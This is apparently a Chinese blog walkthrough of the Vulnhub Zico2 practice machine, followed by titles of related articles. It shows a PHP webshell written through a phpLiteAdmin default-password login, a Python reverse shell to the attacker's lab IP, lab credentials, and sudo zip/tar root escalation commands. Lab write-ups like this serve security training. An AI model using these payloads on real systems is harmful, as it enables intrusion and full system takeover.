一、靶机搭建

选择扫描虚拟机

选择路径即可

二、信息收集

官方信息

先看一下官网的信息

级别:中级

目标:获取root并读取标志文件

说明: Zico正试图建立自己的网站,但在选择使用什么CMS时遇到了一些困难。在尝试了几个流行的之后,他决定自己建造。那是个好主意吗?

提示:枚举,枚举,再枚举!

扫ip

靶机ip:192.168.108.147

扫开放端口

得到以下信息

22/tcp    open  ssh

80/tcp    open  http

111/tcp   open  rpcbind

57413/tcp open  unknown

扫版本服务

可用信息:

22/tcp  open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)

80/tcp  open  http    Apache httpd 2.2.22 ((Ubuntu))

111/tcp open  rpcbind 2-4 (RPC #100000)

指纹探测

nmap 192.168.108.147 -p 22,80,111,57413 -sV -sC -O --version-all

扫描结果

可用信息

运行系统: Linux 2.6.X|3.X

操作系统CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3

OS版本号: Linux 2.6.32 - 3.5

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

先看看dirb扫描

dirsearch扫描

整理一下可用信息

http://192.168.108.147/dbadmin      #数据库文件

http://192.168.108.147/gulpfile.js

http://192.168.108.147/js

http://192.168.108.147/LICENSE

http://192.168.108.147/package

http://192.168.108.147/README.md

http://192.168.108.147/tools

http://192.168.108.147/vendor

http://192.168.108.147/view.php

三、web渗透

信息收集

看看80端口,存在一个框架,指纹信息也没什么可用的

一个个点点尝试,在页面下方,点击此处

看url格式可能存在文件包含漏洞,尝试一下

访问之前扫出来的dbadmin目录,是一个文件

弱口令数据库

打开是一个登录框,搜索一下默认密码

参考文章:https://www.acunetix.com/vulnerabilities/web/phpliteadmin-default-password/ ,拿到默认密码admin

进去之后是如下界面

找找可用信息,发现两个账户和密码

对密码md5解密

如下:

root 密码:34kroot34

zico 密码:zico2215@

ssh登录都登不上去

在网上找找历史漏洞,参考文章:https://github.com/sg1965/PHPLiteAdmin-1.9.3---Exploit-PoC/blob/main/README.md 存在phpliteadmin <= 1.9.3 远程php代码执行漏洞测试,创建一个数据库shell.php

数据库路径:/usr/databases/shell.php,创建表

在表中创建一个文件,写入一句话木马,这里不能用双引号,会被过滤

<?php system($_GET[cmd])?>

创建成功

蚁剑连接

利用文件包含反弹shell

先查看一下

python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.108.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

反弹成功

四、提权

信息收集

先找找可以信息

看看版本信息

找一下历史漏洞

下载下来之后exp利用不成功

进入home目录看看,发现一个wordpress文件夹, 这是一个开源的内容管理系统(CMS),主要用于创建和管理网站和博客。它最初是作为一个博客平台于 2003 年推出的,但随着时间的推移,已经发展成为一个功能强大的网站构建工具,广泛用于各种类型的网站,包括企业网站、电子商务网站、个人博客、新闻网站等。

看看该目录,发现一个配置文件

查看一下,发现数据库密码:sWfCsfJSPV9H3AmQzw8

登录到zico用户

因为拿到了密码,所以可以查看当前用户的权限,有两个文件可以无需root账户直接执行

参考文章:

https://blog.csdn.net/weixin_46700042/article/details/109649363

zip提权

先创建一个文件

然后执行下面的命令

sudo  zip /tmp/tiquan.zip /tmp/tiquan -T --unzip-command="sh -c /bin/bash"

提权成功

tar提权

执行以下命令

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

提权成功

看看flag

Vulnhub-Zico2靶机-漏扫弱口令数据库+文件包含反弹shell+zip,tar提权的更多相关文章

  1. (数据库提权——Redis)Redis未授权访问漏洞总结

    一.介绍 1.Redis数据库 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写.支持网络.可基于内存亦可持久化的日志型.Key- ...

  2. Vulnhub webdeveloper靶机渗透

    信息搜集 nmap -sP 192.168.146.0/24 #主机发现 nmap -A 192.168.146.148 #综合扫描 访问一下发现是wordpress,wp直接上wpscan wpsc ...

  3. [漏洞复现] [Vulhub靶机] Tomcat7+ 弱口令 && 后台getshell漏洞

    免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 背景知识 war文件 0x01 漏洞介绍 影响范围:Tomcat 8.0版本 漏洞类型:弱口令 漏洞成因:在tomc ...

  4. 对vulnhub靶机lampiao的getshell到脏牛提权获取flag

    前言: vulnhub里面的一个靶场,涉及到drupal7 cms远程代码执行漏洞(CVE-2018-7600)和脏牛提权. 靶机下载地址:https://mega.nz/#!aG4AAaDB!CBL ...

  5. zico2靶机渗透

    zico2靶机渗透 开放了四个端口,分别是22,80,111以及57781端口. 扫到了目录http://192.168.114.152/dbadmin/ 进入看到php文件,访问,发现一个登录窗口. ...

  6. kali渗透综合靶机(五)--zico2靶机

    kali渗透综合靶机(五)--zico2靶机 靶机地址:https://www.vulnhub.com/series/zico2,137/#modal210download 一.主机发现 1.netd ...

  7. 2022弱口令实验室招新赛CTF赛道WriteUp

    Misc 签到 下载附件,得到一张二维码. 扫码,然后根据提示"linux"操作系统,直接cat /flag,得到flag. EasyMisc 下载得到EasyMisc附件,压缩包 ...

  8. 基于端口的弱口令检测工具--iscan

    亲手打造了一款弱口令检测工具,用Python编写,主要可以用于内网渗透.弱口令检测等方面,目前集成了常见端口服务,包含 系统弱口令:ftp.ssh.telnet.ipc$ 数据库弱口令:mssql.m ...

  9. 16.Tomcat弱口令 && 后台getshell漏洞

    Tomcat7+ 弱口令 && 后台getshell漏洞 Tomcat版本:8.0 环境说明 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下.其中, ...

  10. [原创]内网SSH密码爆破工具sshcrack(配合Cscan批量弱口令检测)

    0x000 前言 sshcrack是一个命令行下的SSH密码爆破工具,适用于内渗中SSH密码检测 当然也可用于外网SSH密码爆破,支持Windows/Linux,其它系统未测.Tip1 0x001 目 ...

随机推荐

  1. 【金TECH频道】从第一性原理出发,数字原生银行原来可以这样做

    ​ "第一性原理",是最近商界特别流行的一个词. 这个来自于古希腊先贤的古老词汇,本意在于更多聚焦于事物本质,即是用物理学的角度来看待世界,一层层拨开事物表象,看到里面的本质,再从 ...

  2. SpringSecurity认证流程分析

    重要组件 SecurityContext 上下文对象,Authentication(认证)对象会放在里面 SecurityContextHolder 用于拿到上下文对象的静态工具类 Authentic ...

  3. 【转载】 DirectByteBuffer内存释放

    http://www.tianshouzhi.com/api/tutorials/netty/331 我们已经知道,在网络编程中,为了避免频繁的在用户空间与内核空间拷贝数据,通常会直接从内核空间中申请 ...

  4. jenkins build

    clean test org.jacoco:jacoco-maven-plugin:0.8.5:prepare-agent org.owasp:dependency-check-maven:5.3.0 ...

  5. modbus调试助手/mqtt调试工具/超轻巧物联网组件/多线程实时采集/各种协议支持

    一.前言说明 搞物联网开发很多年,用的最多的当属modbus协议,一个稳定好用的物联网组件是物联网平台持续运行多年的基石,所以这个物联网组件从一开始就定位于自研,为了满足各种场景的需求,当然最重要的一 ...

  6. Qt编写推流综合应用示例-文件推流

    一.功能特点 1.1 文件推流 指定网卡和监听端口,接收网络请求推送音视频等各种文件. 实时统计显示每个文件对应的访问数量.总访问数量.不同IP地址访问数量. 可指定多种模式,0-直接播放.1-下载播 ...

  7. Qt编写安防视频监控系统54-轮询配置

    一.前言 视频监控系统中少不了用到视频轮询,按照设计的基本原则,先满足基本的用户需求,稳定跑起来,再去折腾更复杂的应用场景,于是本系统也做了个基本的视频轮询功能,可以设置轮询方案,给某个轮询方案设置轮 ...

  8. Qt开源作品14-导航按钮控件

    一.前言 导航按钮控件,主要用于各种漂亮精美的导航条,我们经常在web中看到导航条都非常精美,都是html+css+js实现的,还自带动画过度效果,Qt提供的qss其实也是无敌的,支持基本上所有的CS ...

  9. SSM或Spring Boot开发中,mapper包中的mapper.xml没有编译到targger中的解决办法

    SSM或Spring Boot开发中,mapper包中的mapper.xml没有编译到targger中的解决办法 在pom文件中加入如下配置: <resources> <!-- 编译 ...

  10. 《Maven应用实战》一书的在线学习网址和源码链接

    <Maven应用实战>杨世文,孙会军 在线学习网址:http://c.biancheng.net/view/4756.html 源码链接:https://pan.baidu.com/s/1 ...